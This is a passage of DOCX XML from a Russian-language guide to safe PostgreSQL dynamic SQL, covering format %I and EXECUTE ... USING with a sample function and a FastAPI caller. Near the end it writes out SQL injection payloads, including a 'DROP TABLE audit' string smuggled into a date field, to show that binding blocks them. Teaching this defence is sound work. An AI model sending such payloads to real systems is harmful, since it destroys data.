      <w:r>
        <w:t xml:space="preserve"> — общая reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026A8166" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF2CC58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «System Information Functions» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-info.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F961ED7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Identifiers and Key Words» (case folding semantics) — https://www.postgresql.org/docs/current/sql-syntax-lexical.html#SQL-SYNTAX-IDENTIFIERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2A0AE7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Pattern Matching» / POSIX regex character classes — https://www.postgresql.org/docs/current/functions-matching.html#POSIX-CHARACTER-CLASSES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F10FDD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Unicode TR #36 «Unicode Security Considerations» — https://www.unicode.org/reports/tr36/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFA8A38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   depesz blog: «format vs quote_ident — when to use what» — https://www.depesz.com/2013/04/05/waiting-for-9-3-add-format-function-with-i-l-s-conversions/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289566C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>•   xflr6 SQL injection safe pattern (R18 reference) — https://gist.github.com/xflr6/33db779acd7fe79faadeb0f28fc053bd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0694B172" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.16.3 EXECUTE ... USING — безопасный bind для значений (не для identifier)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11680B07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT ...' USING $1, $2, ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единственный способ в plpgsql безопасно подставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>значения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в dynamic SQL через bind-параметризацию. Работает так же, как application-side </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-bind через Wire Protocol: значения сериализуются binary, не подвергаются SQL-парсингу, инъекция через quote-escape физически невозможна. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>НО</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>USING $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает для identifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — если попытаться </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'SELECT * FROM $1' USING tbl_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, PostgreSQL интерпретирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>value-position</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не identifier-position → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: syntax error at or near "$1"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>то же протокольное ограничение</w:t>
      </w:r>
      <w:r>
        <w:t>, что и application-side (3.14.2): bind подставляет values, identifier требует текстовой подстановки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7BD040" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>подраздел про защитный pattern + конкретное ограничение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: показывает, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>что USING правильно использовать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для значений) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>что нельзя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для имён) — чтобы в 3.16.4 показать антипаттерн </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t>-concat для значений, который вместо USING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF116BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Защищённый код (canonical pattern).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B025BA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Безопасный pattern: identifier через %I, values через USING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0482ED57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.find_by_id(tbl_name text, row_id int, since_date date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD7C3A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS jsonb LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4979951D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585A6342" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result jsonb;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9EC022" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D9412" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- Identifier через %I (3.16.1), values через USING (3.16.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14664777" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D05A4D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'SELECT to_jsonb(t) FROM %I AS t WHERE t.id = $1 AND t.created_at &gt;= $2',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E250D0B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        tbl_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E724D5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320ED80E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    INTO result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8360E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING row_id, since_date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1128A91A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC0C9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC7F0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9339BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Application-caller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741AF906" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/{table}/{row_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D05490" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def find_by_id(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5848FC0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FA02C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    row_id: int,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C491210" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    since: date = Query(...),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A46C922" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789ED53F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067BF10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27196EF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT app.find_by_id(:tbl, :rid, :since)"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C24B94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"tbl": table, "rid": row_id, "since": since},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA32D3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DC9C20" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.scalar()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045E3871" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>row_id</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7FF19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /users/1%20OR%201=1/?since=2024-01-01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F236D4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>row_id = "1 OR 1=1"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (string). FastAPI cast в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP 422</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на уровне routing, не доходит до handler. Защита </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в двух местах</w:t>
      </w:r>
      <w:r>
        <w:t>: FastAPI типизация + serverside USING-bind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072E2734" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>since</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2B49C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /users/1/?since=2024-01-01';DROP TABLE audit;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF7796C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>since = "2024-01-01';DROP TABLE audit;--"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — FastAPI cast в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
